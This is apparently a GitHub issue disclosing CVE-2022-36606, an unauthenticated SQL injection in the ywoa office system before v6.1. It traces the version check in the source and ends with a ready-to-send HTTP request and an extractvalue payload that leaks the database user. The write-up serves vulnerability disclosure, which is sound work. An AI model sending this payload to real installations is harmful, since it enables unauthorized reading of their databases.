Headline
CVE-2022-36606: yimiYWOA<6.1 version foreground unauthorized SQL injection · Issue #25 · cloudwebsoft/ywoa
Ywoa before v6.1 was discovered to contain a SQL injection vulnerability via /oa/setup/checkPool?database.
Environment construction
http://partner.yimihome.com/static/index.html#/index/sys_env
Direct one-click installation can be started, and then login on the account admin password 1111111, login if prompted authentication expired can not log in, change the local system time can
http://172.16.140.189:8088/oa/setup/license.jsp
Once installed here, the source code is available for download at gitee
https://gitee.com/bestfeng/yimioa
Download a good local idea to open a static look at the code on
[Frontend] <6.1 Version Unauthorized SQL Injection
Through the apikit interface fuzz found an interface that can be unauthorized requests, find the corresponding implementation method in the code
Prerequisite: this hole has a condition, that is, the need for less than 6.1 version, the specific why directly on the code src/main/java/com/cloudweb/oa/controller/ApplicationController.java
The above does not need to care, specifically note the following if(isValid)
First get the version from the configuration
Get to version 6.1, then start the version determination
Determine if it is less than 3
Determine if it is less than 4
Determine if it is less than 5
Determine if it is equal to 6
The condition to be used here is that the version needs to be <= 6 in order to be successful
So change the version
You also need to change one more location, you need to change the version of the database, otherwise the login will prompt the version is inconsistent, the database and configuration file version judgment class in src/main/java/com/cloudweb/oa/service/LoginService.java
Just change the value of the version field in the oa_sys_ver table in the database
Restart tomcat after the change, and then request the specified interface without logging in
POST /oa/setup/checkPool?database=test’ HTTP/1.1 Host: 172.16.140.186:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Length: 2
Found that the return here actually has a return, will prompt the SQL statement to report an error
Here we bring out the user directly with extractvalue
POC
and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))–+
HTTP
POST /oa/setup/checkPool?database=test’and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))–+ HTTP/1.1 Host: 172.16.140.186:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Length: 2